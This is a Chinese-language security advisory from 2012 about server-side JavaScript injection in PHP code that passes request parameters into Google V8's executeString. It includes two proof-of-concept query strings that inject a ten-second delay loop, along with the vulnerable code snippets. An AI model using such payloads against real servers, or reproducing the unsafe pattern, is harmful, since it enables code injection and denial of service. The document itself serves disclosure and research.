Google V8服务器端JavaScript注入漏洞

发布日期:2012-02-25
更新日期:2012-02-28

受影响系统:
Google V8 JavaScript Engine
描述:
--------------------------------------------------------------------------------
Chromium是开源Web浏览器项目。V8是Google的开源JavaScript引擎。

Google的V8服务器端引擎在实现上存在SSJS漏洞,攻击者通过PHP中的服务器端JavaScript注入漏洞导致注入任意代码。

<*来源:Felipe Aragon (felipe@syhunt.com
 
  链接:
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

vulnerable.php?msg=a';d%20=%20new%20Date();do{cd=new%20Date();}while(cd-d<10000);foo='bar


Vulnerable Code:

$msg = $_GET['msg'];
$v8 = new V8Js();
$v8->executeString("var msg = '$msg'; ..SOME CODE..");


vulnerable.php?msg=version());d%20=%20new%20Date();do{cd=new%20Date();}while(cd-d<10000);foo=('bar'


Vulnerable Code:

$msg = $_GET['msg'];
$v8 = new V8Js();
$JS = <<< EOT
len = print($msg + "\\n");
..SOME CODE..
EOT;

$v8->executeString($JS, 'basic.js');

建议:
--------------------------------------------------------------------------------
厂商补丁:

Google
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwdzyg.html